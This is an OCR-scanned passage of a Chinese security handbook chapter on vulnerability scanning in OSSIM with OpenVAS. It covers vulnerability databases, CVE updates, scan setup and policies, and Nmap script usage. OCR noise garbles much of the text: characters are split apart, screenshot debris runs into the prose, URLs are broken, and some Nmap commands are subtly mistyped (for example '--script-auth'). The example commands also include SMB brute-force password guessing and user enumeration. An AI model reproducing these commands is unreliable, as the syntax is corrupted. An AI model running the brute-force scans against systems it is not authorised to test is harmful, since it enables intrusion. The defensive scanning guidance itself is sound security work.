€ DŽ: OSVDB 提供 自己 对 漏洞 的 分 类 ， 包 括 攻击 类 型 、 玻 坏 性 、 本 地 漏洞 还 是 远程 
漏洞 和 那些 服务 相关 联 等 。 

@ 解决 方案 : 对 漏洞 的 修复 说 明 。 

受 影响 产品 : 这 部 分 包含 可 能 受 漏 洞 影响 的 厂家 列表 。 

e 引用 : 表示 本 网 站 收集 的 URL 信息 和 第 三 方 提供 的 漏洞 信息 。 在 OSVDB 中 ， 每 条 
引用 需要 注释 引用 类 型 。OSVDB 提供 了 指向 其 他 主流 漏洞 数据 库 的 引用 ， 例 如 
Security Focus, Secunia, CVE, US-CERT 以 及 VUPEN; 对 漏洞 利用 的 引用 如 
Metasploit、Milw0rm (知名 的 黑客 攻防 小 组 ) ; 扫描 工具 签名 引用 ， 如 Nessus Script 
ID, Snort Signature ID. OVAL ID, Nikto Item ID 等 。 


(3) BugTraq 

BugTraq 是 由 Security Focus 管理 的 Internet 邮件 列表 ， 现 在 已 被 赛 门 铁 克 公 司 收购 。 在 
安全 界 ，BugTraq 相当 于 一 个 权威 的 专业 杂志 。 大 多 数 安全 技术 人 员 订 阅 Bugtraq， 因 为 这 里 
可 以 抢先 获得 关于 软件 、 系 统 漏洞 和 缺陷 信息 。 


9.7.2 ”常见 漏洞 发 布 网 站 
通常 漏洞 研究 都 和 英文 资料 打交道 , 所 以 阅读 下 面 的 内 容 需 要 具有 一 定 英文 水 平 , 这 些 站 
点 为 安全 分 析 人 员 提 供 了 参考 依据 : 
国家 信息 安全 漏洞 共享 平台 : http://www.cnvd.org.cn/ 
Ez http/www.wooyun.org/bugs/ 
国际 权威 漏洞 库 : httpi//www.securityfocus.com 
IBM 网 络 安全 漏洞 库 : http://xforce.iss.net 
俄罗斯 知名 安全 实验 室 : http://en.securitylab.ru 
安全 厂商 绿 盟 科技 : http//www.nsfocus.net 
安全 焦点 : http://www.securityfocus.com/archive// 
国际 权威 漏洞 库 : http://osvdb.org 
http://cve.mitre.org/ 


http://www.exploit-db.com 
http://www.milwOrm.cn/ldong/ 
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9.7.3 ”手动 更 新 CVE Æ 

如 何 更 新 OSSIM 系统 中 的 CVE 数据 库 呢 ? 在 本 书 第 1 章 中 介绍 了 OSSIM 计划 任务 , 其 
中 每 天 执行 的 计划 任务 包含 alienvault-passvulnupdate， 在 这 个 脚本 中 包含 升级 方法 ,但 读者 还 
可 通过 手动 方式 升级 ， 操 作 命 令 如 下 : 

#openvas-scapdata-sync 

该 命令 从 nvd.nist.gov 站 点 下 载 最 新 的 XML 文件 升级 文件 位 于 /var/lib/openvas/scap-data/ 
目录 ， 其 格式 为 nvdcve-2.0-< 年 >.xml， 以 年 为 单位 。 


| openvas-scapdata-sync 命令 首先 下 载 xml， 然 后 进行 自动 更 新 ， 某 些 情况 下 ， 下 载 了 全 部 
| 文件 并 更 新 后 ， 若 发 现 没 有 更 新 ， 则 需要 执行 以 下 脚本 : 


#/usr/share/ossim/scripts/vulnmeter/updateplugins.pl 


9.7.4 采用 OpenVAS 扫描 

OSSIM 系统 通过 OpenVAS 进行 漏洞 扫描 ， 它 提供 了 大 量 免 费 扫描 插件 (NVT ，Network 
Vulnerability Test)，OSSIM 系统 中 包括 四 个 OpenVAS 系统 服务 ， 各 自 承 担 不 同 的 用 途 。 如 果 
选用 较 新 的 OSSIM 4.15 系统 ， 最 低 内 存 配置 为 16GB。 从 部 署 扫 描 器 的 模式 上 看 ， 可 分 为 单 
独 部 署 和 分 布 式 部 署 两 种 方式 。 

单独 部 团 即 单一 节点 扫描 ， 与 传统 Nessus 或 X-scan 扫描 器 相似 ， 分 布 式 部 署 则 通过 在 每 
个 网 络 单元 的 Sensor 上 ， 部 署 独立 的 扫描 引擎 ， 对 该 网 络 单元 的 IT 资产 进行 扫描 ， 在 管理 中 
心 部 署 安全 漏洞 管理 控制 平台 ， 对 所 有 的 扫描 引擎 进行 统一 管理 ， 同 时 所 有 引擎 的 扫描 结果 ， 
全 部 返回 控制 平台 进行 汇总 ,最 终 实 现 全 网 漏洞 的 统一 呈现 、 分 析 和 管理 ,所 以 它 和 资产 管理 
又 紧密 相连 。 下 面 重点 讲述 OpenVAS 的 配置 细节 。 


1. 主要 进程 和 配置 


Openvas 配置 文件 在 /etc/openvas/ 目 录 中 ，OSSIM 系统 中 已 配置 好 Openvas， 默 认 创建 管理 员 
用 户 admin， 所 以 不 必 像 上 面 Nessus 那样 有 比较 复杂 的 配置 过 程 。 服 务 器 层 包 含 以 下 三 个 组 件 : 


€ Openvas Manager， 管 理 程序 ， 负 责 与 客户 端 程序 通信 ， 完 成 扫描 任务 、 配 置信 息 、 
用 户 授权 及 检测 报告 等 工作 并 存储 这 些 信息 ， 它 是 整个 漏洞 扫描 平台 的 中 央 控 制服 
务 ， 它 的 OMP ( Openvas Management Protocol ) 基于 XML， 用 于 设置 扫描 计划 和 生 
成 测试 报告 ， 保 存 扫描 结果 等 ，Openvas Manager 程序 默认 为 TCP 9390 端口 。 

€  Openvas Scanner, Openvas 的 扫描 器 ， 实 际 执行 各 种 网 络 漏洞 扫描 测试 (NVT) 的 主 服 
务 ， 包 括 NVT 的 订阅 和 更 新 ， 还 负责 调用 各 种 漏洞 检测 插件 ， 默 认为 TCP 9391 端口 。 

€ Openvas Administrator， 负 责 与 openvas-manager 通信 ， 完 成 用 户 和 配置 管理 等 操作 ， 
默认 监听 地 址 为 127.0.0.1， 端 口 为 TCP 9393, 
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openvas-manager、openvas-scanner 会 在 OSSIM 系统 启动 时 自动 启用 ， 其 余 两 个 服务 根据 
需要 手动 启动 。 下 面 我 们 在 OSSIM 系统 中 查看 这 两 个 启动 文件 内 容 。 


通过 这 个 配置 文件 发 现 openvas-manager 监听 端口 为 9391。 


通过 这 个 配置 文件 ， 我 们 发 现 openvas-administrator 监听 端口 为 9393， 了 解 这 些 关键 进程 
的 监听 端口 ， 对 今后 我 们 进行 故障 排除 非常 有 帮助 。 


2. OSSIM 下 操作 Openvas 方法 


必要 条 件 : 首先 必须 具有 足够 大 的 内 存 16GB 以 上 )， 其 次 升级 补丁 工作 建议 在 系统 刚 架 设 
完毕 就 做 ， 然 后 升级 Openvas 插件 。 最 后 确保 Sensor 传感器 为 可 用 状态 ，Nmap 进程 运行 正常 。 


扫描 前 要 确保 服务 器 和 客户 机 的 时 钟 要 保持 一 致 


操作 步骤 概括 如 下 : 


© 定义 扫描 目标 ,可 以 是 IP 地 址 、 网 段 地 址 ; 

e ”创建 新 任务 ， 选 择 扫描 目标 、 扫 描 方 式 ; 

e 运行 新 创建 的 扫描 任务 ; 

o “等待 扫描 结束 ， 然 后 查看 扫描 报告 。 

以 OSSIM 4.3 平台 为 例 ， 操 作 过 程 说 明 如 下 : 

(1) 选择 Anaylysis 一 Vulnerabilities ， 然 后 单 击 New scan job 按钮 ， 开 始 创建 一 个 新 的 
扫描 任务 。 

Q) 从 上 到 下 依次 输入 任务 名 称 ， 例 如 “Serverl ”， 选 择 关 联 引擎 ， 如 果 是 分 布 式 系统 
就 要 选择 相应 的 传感器 ， 然 后 选择 扫描 方式 选项 ， 包 括 立 即 执行 、 每 天 /每 周 执行 ， 系 统 提供 
了 非常 详细 的 计划 任务 列表 ， 如 图 9-76 所 示 。 


579 


4&3 6 ——OSSIM 最 佳 实践 


VULNERABILITIES 
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* y Asset Groups 
= $ Networks 
= ge 192168.1L---/-- 
= gi Local. 192.168. 11.0.24 (192.168110/24) 
* si Network Groups 
= i Visibility 


Local_192_168_11.0.24 (192.168.11.0/24) 


= © My Company 
= «> Assets from My Company 
* Assets 
= 最 Asset Groups 
* ge Networks 
* Dh Network Groups. 


EAE 
图 9-76 扫描 网 段 


建议 不 要 扫描 过 多 的 主机 (以 本 书 第 1 章 推荐 的 服务 器 配置 为 基准 , 建议 每 次 扫描 主机 数 


量 ， 以 不 超过 30 AHE, 在 系统 /etc/openvas/openvassd.conf 配置 文件 中 , 定义 最 大 主机 数 为 $ 
台 ， 每 台 主 机 同时 检查 插件 数 为 10 条 )， 如 图 9-77 所 示 。 


Configuration 


(greatly speeds up the scanning 
process) 


Pvt 192 (192 168.0.0/16) * 4$ 192.168.11 (2 hosts) 
= 最 Host Groups 
No Host groups found 

= gs Networks 

= s 10.0.0.—---- 

* 二 172.16.0.---/-- 

= Z 192.168.0.---/-- 

* a 

= „i Network Groups 


M Pre-Scan locally 
(do not pre-scan from scanning 
sensor) 


站 


You are about to scan a big number of hosts (65534 
hosts). This scan could take a long time depending 
on your network and the number of assets that are 
up. are you sure you want to continue? 


Target Inventory Target Alowed — Sensors  SensorAliowed Vuln Scanner NmopScon Load 
192.168.0.0/16 Pvt 192 " 192.168.11.28 [alienvault] v v Prescan localy 0% 
pae . SconneriP Scanner connection 
192168 11.28 v 


9-77 一 次 扫描 过 多 主机 情形 


GO 最 后 对 任务 进行 扫描 检测 以 确保 以 下 要 求 : 扫描 检查 结果 包含 目标 IP 和 主机 名 , 传 
感 器 是 否 启用 ， 漏 洞 扫描 库 是 否 准备 好 ，Nmap 是 否 可 用 这 几 个 参数 ， 如 图 9-78 所 示 。 
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Configuration Check Results 


Target Inventory Target Allowed 
192.168.0.0/16 — Pv 192 


Sensors Sensor Allowed Vuln Scanner Nmap Scan Load 


Y 492.168.120.169 [alienvault] Y Y Y 0% 
192.168.120.169 — alienvault v 192.168.120.169 [alienvault] v v v 0% 
Scanner IP Scanner connection 


图 9-78 扫描 准备 工作 


选取 系统 资源 时 , 注意 要 从 Assets 资源 池 中 选取 , 而 不 能 手工 输入 IP 地 址 的 方式 .OSSIM 


4.6 以 后 的 系统 Web UI 发 生 较 大 变化 ， 其 Web 漏洞 扫描 菜单 路 径 为 : Environment 一 
Vulnerabilities， 如 图 9-79 所 示 。 


sel X L El 
DASHBOARDS 


ANALYSIS 


ENVIRONMENT 


REPORTS 

/ULNERABILITIES 

overview | SCANJOBS | — THREATDATABAS 

^ CREATE SCAN JOB. 
Job Name: fed 
Select Server First Available Server Distributed [v] 
Profile: [Default - Non destructive Full and Fast scan Iv] itor 
Schedule Method: T E 
d = «» All Assets 

WEGEN 

ony scan hosts that are Type here to searc are RANEA A 
et Se vp he inana 
Sanning process? piaraan 


回 prescan locally 
(do not pre-scan from 
scanning sensor) 


C Do not resolve names 


图 9-79 OSSIM 4.6 漏洞 扫描 设置 
Open VAS 提供 了 三 种 策略 : 


€  Deep-Non destructive Full and Slow scan ( 非 破坏 性 的 全 面 和 慢 扫 描 ) 。 
€  Default-Non destructive Full and Fast scan ( 非 破 坏 性 全 面 和 快 扫描 ) 。 


€ Ultimate-Full and Fast scan including Destructive tests ( 极限 方式 、 全 面 和 快 扫 描 ， 包含 
破坏 性 测试 速度 最 慢 ， 慎 用 ) 。 


如 图 9-80 所 示 为 选择 Sensor 进行 扫描 。 
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«> Ali Assets 
c8 Assots 
« g Asset Groups 
Š Networks. 
T gs 19216811. 一 一 
S Locel_192_168_11_0_24 ftsatoan 020) 
oroups 


CONFIGURATION CHECK RESULTS 


TARGET INVENTORY TARGET ALLOWED SENSORS SENSORALLOWED VULNSCANNER NMAPSCAN LOAD 


图 9-80 选择 Sensor 进行 扫描 
无 论 哪个 版 本 的 OSSIM 扫描 时 ， 都 会 消耗 服务 器 的 大 量 资源 。 通 常情 况 下 ， 建 议 扫描 机 
器 不 宜 过 多 ， 每 个 任务 以 25 台 左 右 为 宜 ， 可 根据 机 器 配置 情况 做 适量 增 减 。 在 配置 文件 
/etc/openvas/openvassd.conf 中 可 以 适当 改变 该 值 。 


Legend 二 
97.5 “扫描 过 程 Completed 
在 OSSIM 中 进行 漏洞 扫描 ， 首 先 保证 内 存 足够 。Openvas 管 D| mw 
理 进程 和 扫描 进程 均 正常 启动 ， 端 口 处 于 监听 状态 。 正 常情 况 下 扫 LE d 
描 从 开始 经 过 四 个 状态 ， 分 别 是 Schedued、Requested、Running、 LI send , 
Commpleted， 如 该 变迁 过 程 出 现 “Failed” 或 “Timeout” 都 表示 扫 Timeout 
een "di Mt dons 图 9.81 WERA 


COD 按 严重 程度 分 类 
Openvas 用 5 种 颜色 对 漏洞 进行 分 级 显示 ， 并 将 不 同 种 类 扫描 漏洞 数量 用 饼 图 表示 出 来 ， 


各 种 颜色 代表 含义 如 下 : 
€ Serious: 用 紫色 表示 ， 表 示 非 常 严重 的 漏洞 ， 将 会 影响 关键 业务 的 紧急 威胁 需要 立即 
修复 。 
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€ Hight: 用 红色 表示 ， 表 示 高 度 危险 ， 影 响 关键 业务 ， 非 直接 威胁 ， 对 于 以 上 两 种 高 
危 漏洞 需要 再 进行 渗透 测试 工作 。 

€ Medium: 用 橘 红色 表示 ， 代 表 中 度 危 险 ， 影 响 业务 的 非 直接 威胁 。 

€ Low: 用 黄色 表示 ， 代 表 低 危险 性 。 

€ Info: 用 淡 黄 色 表示 ， 代 表 普 通信 息 。 


通常 我 们 用 Nessus 扫描 系统 后 得 到 了 各 种 类 型 、 数 量 众 多 的 扫描 结果 ， 大 家 开始 发 愁 ， 
这 么 多 的 信息 ， 该 怎样 把 它们 整理 并 分 类 ， 更 加 直观 地 展示 出 来 ? 在 图 9-82 中 ，OSSIM 已 为 


你 考虑 到 这 一 点 ， 它 使 用 MySQL 数据 库 来 保存 渗透 测试 过 程 中 获取 的 各 种 数据 ， 并 通过 饼 图 
和 柱状 图 把 这 些 存 储 在 数据 库 中 的 数据 以 可 视 化 方式 展示 出 来 。 


Vulnerabilities Found - 621 


Bl serious - 5 
E High - 29 
Medium - 34 
E] Low - 465 
| `~ O Info - 88 
s 
5t 
E ax 
SUMMARY OF SCANNED HOSTS 
HOST HOSTNAME | Serious * | High * | Medium * Low *« Info. A 
Ld 
mm 2 n 
t ad 
182168 Me-— &— Host-1 92-1 68-A 


9-82. 可视化 展示 漏洞 扫描 结果 


如 果 要 了 解 详情 ， 点 击 某 个 IP 的 漏洞 数目 ， 即 可 显示 出 类 似 下 面 的 一 段 结果 。 如 图 9-83 
所 示 。 
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TCP Sequence Number Approximation Reset Denial of Service Vulnerability 902815 general (O/tcp) High ED 


Summaryn The host is running TCP services and is prone to denial of Family name: Denial of Service 
service Wnvulnerability Vn 

Vulnerability Detection:\n A TCP Reset packet with a different sequence number Category: infos 

is sent to\nthe 

target. A previously open connection ls then checked ta see if the target\nclosed Copyright Copyright (C) 2012 SecPod 
it or not win 

Vulnerability Insighe\n The flaw is triggered when spoofed TCP Reset packets — Summary: Determine TCP Sequence Number Approximation Vulnerabilty 
are received by 

the\ntargeted TCP stack and will result in loss of availability for the attacked\nTCP Version: $Revision: 985 $ 

services Vn. 

Impactin Successful exploitation will allow remote attackers to guess sequence 

numbers\nand cause 

a denial of service to persistent TCP connections by repearedly ninjecting a TCP 

RST packet. vn 

Affected Software /OS:\n TCP/IP v4\n\n Solutioni\n Please see the referenced 

advisories for more 

information on obtaining nand applying fises \n\nCVSS Base Score: 5.0 


vos 
E 9-83 某 个 IP 的 漏洞 数目 


在 上 面 的 界面 显示 中 ， 图 标 包 表示 附加 信息 ， 扩 表示 可 信 ， 鸳 表示 不 可 和信， 点 击 当 图 标 
显示 更 多 详细 信息 ， 尤 其 是 CVSS 的 分 值 需 要 介绍 一 下 ，CVSS 表示 Common Vulnerability 
Scoring System 通用 漏洞 评价 体系 。 利 用 该 标准 ， 可 以 对 弱点 进行 评分 ， 进 而 帮助 我 们 判断 修 
复 不 同 弱点 的 优先 等 级 ， 它 的 取 值 范 围 为 0~10， 具 体 而 言 是 从 0.0 (不 受 影 响 的 系统 ) 到 10.0 

(最 受 影 响 的 系统 ， 具 有 很 高 的 灾难 性 破坏 的 风险 )。 


(2) 按 服 务 漏洞 数量 排行 TOP 10 
在 “By Services Top 10” 中 能 列 出 网 络 服务 存在 漏洞 数量 的 排行 以 饼 图 表示 ， 如 图 9-84 
所 示 。 


BY SEVER BY SERVICES - TOP 10 


iscsi-target (tcp/3260) [1] 

ndmp (tcp/10000) [1] 

domain (udp/53) [1] 

nsp (tcp/554) [1] 

vdk-datastream (tcp/9100) [1] 
dec-notes (tcp/3333) [1] 

bacula-dir (tcp/9101) [1] 
sidewinder-game-voic (tcp/9110) [1] 
shell (p/514) [1] 

unknown (tcp/845) [1] 


图 9-84 扫描 详细 结果 


9.7.6 ”变更 扫描 策略 

系统 默认 的 扫描 器 策略 非常 严格 , 扫描 内 容 多 ， 过程 长 ， 如 果 在 自己 熟悉 的 网 络 环境 中 有 
时 需要 修改 策略 , 则 进行 以 下 操作 ,这 时 我 们 需要 单 击 Vulnerabilities 一 Scan Jobs Ff“ Profiles” 
按钮 ， 出 现 如 图 9-85 所 示 的 界面 。 
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Profiles 


Vuln can Profiles 


ity 


Please select a profile to edit: 


Available for Profile Description Action 
All Deep Non destructive Full and Slow scan 
All Default Non destructive Full and Fast scan 
All test dasd s,H 
All Ultimate Full and Fast scan including Destructive tests 
All zhongdeng P4] 


EXITLLM) 
图 9-85 更 改 策略 


单 击 Creat New Profile 按钮 ， 出 现 如 图 9-86 所 示 的 界面 。 


Profiles 


^ 


Name: 


Description: 


Clone existing scan policy: 


Make this profile available for User | admin E 
Autoenable plugins option: Autoenable by category € 
Set all autoenabled categories to: Enable All : 


Autoenable plugins in categories: 


Category Enable All Enable New Disable New Disable All Intelligent 
ATTACK (C) 
DENIAL a 
DESTRUCTIVE_ATTACK - 
END e 
FLOOD 
INFOS 
INIT 
KILL. HOST 
MIXED 
SCANNER 
SETTINGS e 


Et 
图 9-86 新 建 扫描 策略 


单 击 创建 策略 ， 然 后 在 Profile 菜单 中 出 现 刚才 定义 的 策略 ， 如 命名 为 “lcg”。 如 图 9-87 
所 示 。 
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Vulnerabilities 


Oveview o. ENTERS 
* A 
posname Es 
— €— 
m 
rone — 
m— 
— 
S Only scan hosts that are alive = AI Assets 
(greatly speeds up the scanning = i Hosts 
E 
Fes -EETGETETIT RETO TET 19216811 oraw 
S Pre-Scan local Hos192: 1682 92,168. Š 192.168.11.1 oscil92168.1171) 
(do not pre-scan from scanning ———— & 192.168.11.3 (Host192168-11-3) 
Ei È Is268 Ato im Y 
PENS 182.16811.7 no int 
iler 12.168.11.12 Host192-165.11-12) 
ENTE 
268150 mem 192 16611 50) 
d 2 1 I cta irm 
1 19216811 218 icm 
^ d ett crop 
ic 
[2 00e 


9-87 选择 自 定义 策略 


如 图 9-88 所 示 ， 在 “SCAN JOBS” 中 选择 失败 的 扫描 ， 然 后 单 击 图 示 右 侧 垃圾 桶 图 标 即 
可 删除 。 


OVERVIEW | SCANJOBS | THREAT DATABASE 


JOE NAME LAUNCH mwe scan STAR MME 


Q tnnt 


mmm 
E 9-88 删除 失败 的 扫描 任务 


[E 当 更 改 了 默认 策略 之 后 ， 必 须 经 过 严格 的 测试 方 可 通过 。 
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9.7.7 Nmap 与 OpenVAS 的 区 别 

有 的 读者 容易 把 Nmap 和 OpenVAS 的 功能 搞 混 淆 ， 从 范围 上 看 ，Nmap 主要 用 于 大 范围 
扫描 ， 特 点 是 速度 快 ， 但 没有 漏洞 库 ， 而 OpenVAS 适用 于 量 少 、 多 次 地 对 局 部 机 器 进行 的 漏 
洞 扫描 ， 它 默认 带 了 4 万 多 个 漏洞 库 脚本 。 它 们 都 是 扫描 工具 ， 其 偏重 不 同 ，Nmap 是 端口 扫 
描 工具 ， 属 于 轻 量 级 工具 。Nmap 的 特点 是 结构 简单 速度 快 ， 用 于 前 期 侦查 。 

Nmap 的 基本 介绍 和 基本 使 用 方法 , 互联 网 上 提供 的 内 容 比较 详细 , 这 里 给 大 家 介绍 Nmap 
可 以 集成 的 功能 强大 的 插件 ， 如 表 9-5 所 示 ， 这 些 插件 主要 分 为 以 下 几 类 。 


表 9-5 nmap 插件 

插件 名 称 功能 
Auth 负责 处 理 鉴 权证 书 
Broadcast 探测 服务 打开 状态 
Brute 暴力 破解 方式 ， 针 对 常见 应 用 http 等 
Default 和 使 用 -sC 和 -A 开关 一 样 仅 提供 基本 扫描 
Dos 进行 Dos 攻击 
Exploit 利用 应 用 程序 的 漏洞 ， 进 行 渗透 测试 
External 利用 第 三 方 的 数据 进行 whois 解析 
Fuzzer 模糊 测试 的 脚本 ， 发 送 异常 包 到 目标 主机 
Malware 测试 目标 主机 是 否 带 有 后 门 等 信息 
Version 负责 增强 服务 于 版 本 扫描 
Vuln 负责 检查 目标 主机 是 否 有 漏洞 

使 用 举例 : 


(1) nmap --script-auth 192.168.123.* 
负责 处 理 鉴 权证 书 的 脚本 ， 也 可 以 作为 检测 部 分 应 用 弱 口 令 。 


(2) nmap --script-brute 192.168.123.* 
提供 暴力 破解 的 方式 可 对 数据 库 、Smb、Snmp 等 服务 进行 简单 密码 的 暴力 猜 解 。 


(3) nmap -script-default 192.168.123.* 或 者 nmap -SC 192.168.123.* 
默认 的 脚本 扫描 ,主要 是 搜集 各 种 应 用 服务 的 信息 , 收集 到 后 ， 可 再 针对 具体 服务 进行 攻击 。 


(4) nmap --script-vuln 192.168.123.* 
检查 是 否 存在 常见 漏洞 ， 输 出 内 容 多 需要 翻 屏 显 示 。 


(5) nmap -n -p445 --script-broadcast 192.168.123.4 
在 局 域 网 内 探查 更 多 服务 打开 状况 。 


(6) nmap --script-smb-enum-users 192.168.199.9 
对 192.168.199.9 这 人 台 机 器 进行 扫描 ， 同 时 对 smb 的 用 户 进行 枚 举 。 
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(7) nmap --script=smb-brute 192.168.199.9 
对 192.168.199.9 的 用 户 名 和 密码 进行 暴力 猜测 。 


(8) nmap --script all 192.168.0.1 

使 用 所 有 脚本 进行 扫描 。 

Nmap 拥有 一 百 多 个 脚本 插件 ， 详 细 介 绍 大 家 可 以 参阅 http://nmap.org/nsedoc/, 在 OSSIM 
中 的 Nmap 工具 里 的 插件 位 于 /usr/share/nmap/scripts/ 目 录 ， 格 式 为 *.nse。 而 Openvas 是 漏洞 扫 
描 工 具 ， 它 主要 用 于 对 已 知 的 主机 进行 漏洞 扫描 ， 结 构 复 杂 ， 速 度 慢 , 输出 报表 详细 ， 扫 描 时 
将 创建 多 个 进程 ， 需 要 消耗 CPU 资源 ， 所 以 对 于 大 规模 扫描 时 速度 慢 。 

OSSIM 系统 在 进行 漏洞 扫描 时 ， 首 先 通 过 端口 扫描 工具 Nmap， 判 定 目标 存活 性 以 及 目 
标 系 统 所 开放 的 服务 和 端口 , 然后 根据 服务 类 型 与 目标 进行 多 次 的 数据 交互 , 根据 返回 信息 的 
特征 和 漏洞 数据 库 进行 匹配 ， 来 判断 目标 是 否 具有 某 种 漏洞 ， 最 后 给 出 详细 的 报表 。 


9.7.8 ”分布 式 漏洞 扫描 

在 单个 OSSIM 系统 中 的 漏洞 扫描 系统 (Openvas、Nessus 等 ) 采用 集中 式 ， 它 由 中 心 控 制 节 
点 或 服务 器 负责 进行 漏洞 扫描 并 存放 结果 ， 这 种 方式 最 严重 的 缺点 就 是 当 同时 扫描 的 目标 主机 较 
多 (例如 有 效 主机 大 于 25 A) 时 服务 器 端 会 成 为 信息 处 理 的 瓶颈 ， 从 而 导致 整个 系统 性 能 下 降 ， 
严重 时 远程 控制 端 无 法 连接 服务 器 。 在 升级 时 需要 在 每 个 Sensor 上 更 新 OpenVAS 漏洞 库 。 

如 果 有 多 个 网 段 , 大 量 主 机 需要 漏洞 扫描 时 , 应 分 别 在 每 个 监控 网 段 部 署 一 个 探测 器 进行 
漏洞 扫描 ， 然 后 将 扫描 结果 汇总 到 主 服务 器 端 ,， 进行 分 析 并 集中 存储 。 这 样 可 以 将 扫描 的 压力 
分 摊 到 各 个 探测 器 上 。 我 们 在 Web 界面 上 也 能 同时 看 到 两 个 Sensor 的 存在 。 分 布 扫描 拓扑 如 
图 9-89 所 示 。 


T f xx 
应 用 服务 器 TARAS L4 TERAH 


图 9-89 分 布 式 扫描 拓扑 
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E 在 扫描 前 要 选择 好 扫描 器 ，OSSIM 4.8 版 路 径 为 Configuration 一 Administration 一 Main 一 > 
i Vulnerability Scanner 下 拉 列 表 中 选择 OpenVASManager， 如 图 9-90 所 示 。 


Vulnerability Scanner configuration 


Vulnerability Scanner Nessus 5:304 X - © 
| per Ope: - 
Scanner Login OpenVAS 3 x © 
]openvas2x 
Scanner Password Nessus 2x [7] 
Nessus 3x 
Scanner host Nessus 5/4 x © 
Scanner port 9390 © 
Scanner Binary location Iusr/bin/omp © 
Scanner Updater location /ust/sbin/openvas-nvt-sync. © 
Enable Pre-Scan locally Yes[v] © 
Vulnerability Ticket Threshold — (2 [v] © 


图 9-90 选择 Openvas 版 本 


在 使 用 Vulnerability 扫描 时 ,应 先 将 扫描 主机 通过 Asset 扫 一 遍 , 然后 从 Host 列表 中 选择 
单 台 主机 ， 不 建议 从 一 个 网 段 开始 扫描 ， 扫 描 进程 一 旦 开始 就 不 要 终止 ， 除 非 整 个 机 器 死 锁 。 
扫描 结束 后 ， 我 们 可 以 在 首页 面板 和 Analysis 一 Vulnerabilities 中 看 到 结果 。 


9.7.9 ”设置 扫描 用 户 凭证 

在 漏洞 扫描 时 包括 直接 扫描 (例如 X-Scan、Nessus 等 )， 还 有 带 凭证 的 扫描 测试 ， 这 里 说 
的 凭证 是 指 访问 Openvas 服务 时 所 需要 用 户 名 或 密码 。 然而 很 多 攻击 者 在 拥有 一 定 权 限 后 , E 
们 的 目标 在 于 将 权限 提升 为 超级 用 户 ， 从 而 可 执行 特殊 命令 , 因此 如 果 赋 予 测试 进程 以 目标 系 
统 的 角色 ， 将 能 够 检测 出 更 多 漏洞 ， 这 就 是 带 赁 证 测试 的 初衷 。 如 图 9-91 所 示 的 Settings T 
钮 ， 用 于 检测 root HA EH o 


9-9] 设置 凭证 
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9.7.10 ”扫描 频率 

对 网 络 资源 进行 漏洞 扫描 ， 如 果 使 用 不 当 , 往往 好 心 办 坏事 , 例如 一 些 用 户 将 漏洞 扫描 器 
当 作 “黑客 工具 ”滥用 , 在 识别 漏洞 的 过 程 中 ， 它 会 向 目标 发 送 大 量 数据 包 ， 有 时 候 甚至 造成 
拒绝 服务 , 无 论 什么 漏洞 扫描 器 会 采用 模拟 攻击 的 形式 , 对 目标 可 能 存在 的 已 知 安全 漏洞 进行 
逐 项 检查 , 滥用 所 造成 的 影响 和 真实 攻击 造成 的 损失 相似 。 所 以 大 家 在 使 用 时 一 定 要 注意 规避 
风险 。 

那么 扫描 周期 为 多 少 合适 呢 ? 在 PCI 2.0 中 的 R.11.2 中 要 求 至 少 每 季度 对 内 外 网 扫描 一 
次 。 其 实 面 对 这 一 问题 并 没有 最 佳 答案 ， 好 比 “ 多 久 该 锻炼 一 次 ”一 样 ， 尤 其 涉及 漏洞 扫描 、 
渗透 测试 这 种 复杂 的 工作 , 要 面 对 太 多 的 变量 , 你 问 10 个 人 可 能 得 到 10 种 不 同 的 答案 , 但 有 
一 点 大 家 需要 明白 , 我 们 通过 漏洞 扫描 需要 解决 什么 问题 ? 我 们 的 目标 是 要 找 出 漏洞 , 最 大 限 
度 地 减少 业务 系统 因为 系统 漏洞 所 造成 的 风险 ， 有 鉴于 此 , 漏洞 扫描 的 次 数 , 在 保证 系统 稳定 
的 情况 下 ， 越 多 越 有 利于 保持 安全 风险 的 可 控 ， 屠 到 底 是 每 天 一 次 ?每 周一 次 ?还 是 每 月 一 次 ? 
这 就 要 看 受 控 网 络 中 设备 的 规模 。 

在 使 用 漏洞 扫描 工具 时 , 需要 注意 , 对 于 初次 使 用 一 般 是 手动 运行 , 不 要 使 用 计划 任务 将 
其 设置 成 自动 运行 状态 ， 待 环境 熟悉 了 《比如 对 服务 器 网 络 设备 都 相当 了 解 之 后 )， 再 选择 计 
划 任 务 自动 执行 。 另 外 还 要 注意 , 漏洞 扫描 的 并 发 的 线程 数 、 数 据 包 间隔 时 间 、 扫 描 对 象 总 数 
等 ， 这 些 项 应 该 能 够 调整 ， 以 便 使 网 络 的 影响 降 到 最 低 。 图 9-92 就 是 OpenVAS 在 对 某 服务 器 
进行 漏洞 扫描 时 ， 出 现在 SIEM 控制 台 的 报警 。 


EVENTS 
D] SIGNATURE v DATE GMT-500 a SENSOR SOURCE DESTINATION 
o U snort: "ET WEB SERVER Possible CVE-2014-6271 2014-11-03 22:58:06 alienvauit. 1032 1£23351902 10.32.14. 15:80 
Attempt in Headers" 
C i snor: "ET WEB. SERVER Possible CVE-2014-627 2014-11-03 22:58:05 aüenvauk —— 10.32 142951886 10321410350 
Attempt in Headerz 


j C) U snort "ET WEB, SERVER Possible CVE-2014-6271 2014-11-03 2258:05 slienvauk 10.32. TESERS1885 1032.14.124:80 
Attempt in Headers" 


2014-11-03 22:58:05 alienvaut  10.32.14.13851883 10.32.14.10880 


图 9-92 Hi Open VAS 漏洞 扫描 时 触发 Sensor 上 的 IDS 所 呈现 的 事件 报警 


9.7.11 漏洞 扫描 超时 问题 

通常 对 一 台 主机 进行 漏洞 扫描 需要 花费 8-10 分 钟 ， 而 对 一 个 网 段 数目 不 多 的 主机 扫描 通 
常 需要 数 小 时 ， 根 据 所 打开 服务 类 型 的 不 同 ， 扫 描 时 间 不 等 ， 但 如 果 扫 描 一 台 主机 时 间 很 短 
小 于 3 分 钟 或 时 间 很 长 (例如 大 于 350 分 钟 )， 这 种 扫描 任务 应 立即 终止 ， 如 图 9-93 所 示 。 
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ALLSCANS 


Owner: aamin 
STATUS JOB NA * IME — SCANENDTIME — SCANTIME NEXTSCAN ACTION 


E] Completed 06:02 2015-04-14 16:05:48 299 mins ea ESAn] 


E completed 


A602 2015044090142 15mins Pe E EAG] 


Timeout expired 
te test — 2050413191803 2015043192003 2015044032022 480 mins s zs acom 
Timeout exprea. 


图 9-93 ”对 一 个 网 段 进行 扫描 所 花费 的 时 间 


OpenVAS 扫描 故障 排除 


